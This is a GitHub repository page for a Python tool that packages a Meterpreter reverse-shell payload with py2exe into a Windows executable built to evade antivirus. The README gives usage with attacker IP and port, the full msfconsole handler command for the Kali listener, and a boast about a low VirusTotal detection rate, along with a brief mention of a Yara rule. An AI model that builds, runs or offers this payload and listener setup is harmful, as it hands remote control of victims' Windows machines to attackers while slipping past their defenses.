Skip to content

Simple python script to evade antiviruses on fully patched and updated Windows environments using a py2exe.

Notifications You must be signed in to change notification settings

0xCyberY/Antivirus-Evasion-Py2exe

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

36 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

GitHub language count GitHub repo size Lines of code GitHub GitHub commit activity Twitter Follow

Antivirus-Evasion-Py2exe

Simple python script to evade antiviruses on fully patched and updated Windows environments using a py2exe.

Note: This script works only on Windows OS

Prerequisite:

  1. Install Python 2.7.16 x86 for Windows
  2. Install Py2exe 32 bits for Python 2.7

Usage:

python aepy2exe.py -ip 192.168.1.10 -p 443
C:\>python aepy2exe.py -h
                                Antivirus Evasion Py2exe
 ,.      .                         ,--.                         ;-.      ,-.
/  \     |   o     o               |                o           |  )        )
|--| ;-. |-  . . , . ;-. . . ,-.   |-   . , ,-: ,-. . ,-. ;-.   |-'  . .   /  ,-. . , ,-.
|  | | | |   | |/  | |   | | `-.   |    |/  | | `-. | | | | |   |    | |  /   |-'  X  |-'
'  ' ' ' `-' ' '   ' '   `-` `-'   `--' '   `-` `-' ' `-' ' '   '    `-| '--' `-' ' ` `-'
                                                                     `-'
usage: aepy2exe.py [-h] [-e EXECUTE] [-ip ATTACKER_IP] [-p PORT]

Antivirus Evasion Py2exe

optional arguments:
  -h, --help            show this help message and exit
  -ip ATTACKER_IP, --attacker_ip ATTACKER_IP
                        specified attacker IP
  -p PORT, --port PORT  specified attcaker port

Example:
        C:\>python aepy2exe.py -e py2exe -ip <ip_address> -p <port>

The script will generate CyberY.exe. Output

In case there is an error such as The system cannot open the device or file specified. Try hard!!

Run the CyberY.exe

C:\>.\CyberY.exe

On attacker machine (Kali)

sudo msfconsole -x "use exploit/multi/handler; set PAYLOAD python/meterpreter/reverse_tcp; set LPORT 443; set LHOST 192.168.1.10"

msf6 exploit(multi/handler) > exploit

Yara Rule

You can check the Yara rule to identify the file as it's not detected by windows defender.

Conclusion

Keep in mind that attempting antivirus bypass is a game. Whenever a new evasion technique gets popular, antivirus vendors will eventually learn about itand update their signatures database to block it. Then, new evasion techniques will a rise, which will make vendors to add it to their signature database, and so on.

By the time of this writing, the payload was flagged as malicious by only one vendor on Virus Total.

virus_total

Credit Marcelo Sacchetin

About

Simple python script to evade antiviruses on fully patched and updated Windows environments using a py2exe.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published